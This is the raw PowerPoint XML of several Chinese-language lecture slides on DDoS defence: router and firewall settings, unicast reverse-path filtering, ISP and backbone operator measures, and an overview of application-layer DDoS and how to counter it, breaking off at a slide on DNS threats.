      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>禁止对主机的非开放服务的访问</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>限制同时打开的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最大连接数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>限制特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址的访问</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启用防火墙的防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>严格限制对外开放的服务器的向外访问，防被当肉鸡。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cisco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由器为例 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cisco Express Forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>快速转发）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简化查询步骤，利用专用硬件达到线速转发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>unicast reverse-path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（单播逆向路由，向后看）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只转发源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址在路由表中存在并有效的数据包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问控制列表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包流量速率</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>升级版本过低的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为路由器建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>log server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1196999054"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ISP / ICP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为很多中小型企业提供主机托管业务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>托管主机是黑客最喜欢的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>肉鸡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>都是高性能、高带宽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全管理差：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>赤膊上阵：基本补丁都没打，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理员对托管主机没有直接管理权力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黑客怎么用都不会有被发现的危险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时，要特别注意自己管理范围内的客户托管主机不要成为傀儡机。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理员</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193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3039213594"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>骨干运营商联手来解决</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>运营商在自己出口路由器进行源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如在自己路由表中没有到某数据包源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的路由，就丢掉该包。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单播逆向路由</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会降低路由器效率，实施很困难。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把自己网络与主机维护好</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不让自己主机成为肉鸡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>受到攻击时尽量保存证据，以便事后追查，维护良好的网络和日志系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>骨干网络运营商</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194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29009238"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用真实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与目标完成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三次握手，建立连接，向目标服务器提交大量服务请求，使其处理不过来，从而瘫痪，拒绝为正常用户服务。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最主要技术：实现对服务器资源的有效消耗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提交较长请求消耗服务器缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使大量合法请求无法进入缓冲区而被丢弃    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载大文件，导致对磁盘的频繁访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求较大文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如较大图片和页面，有效消耗网卡计算能力和下行链路带宽。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提交大计算开销请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以小博大</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算复杂性高的操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如加解密计算；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>复杂数据库操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如某个属性的最大值查询。有效消耗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或数据库服务器的计算能力。如通过程序写大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包，提交给服务器，查询数据库。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用层 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</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195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3549096613"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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在网络层行为表现正常，能够有效逃避网络层级的检测和过滤。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要防御方式 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用代码性能优化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>合理使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>及时地释放资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络架构优化 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>善于利用负载均衡分流</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对抗手段 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>限制每个“客户端” 做请求频率的限制（基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>确定客户端），攻击者可以使用代理服务器发起攻击突破该限制。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用层 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防御</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196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4240902968"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用层安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="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D33B339-3AD4-468E-85FE-A955C169D0B3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3830692733"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存可能被毒害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——DNS</a:t>
            </a:r>
            <a:r>
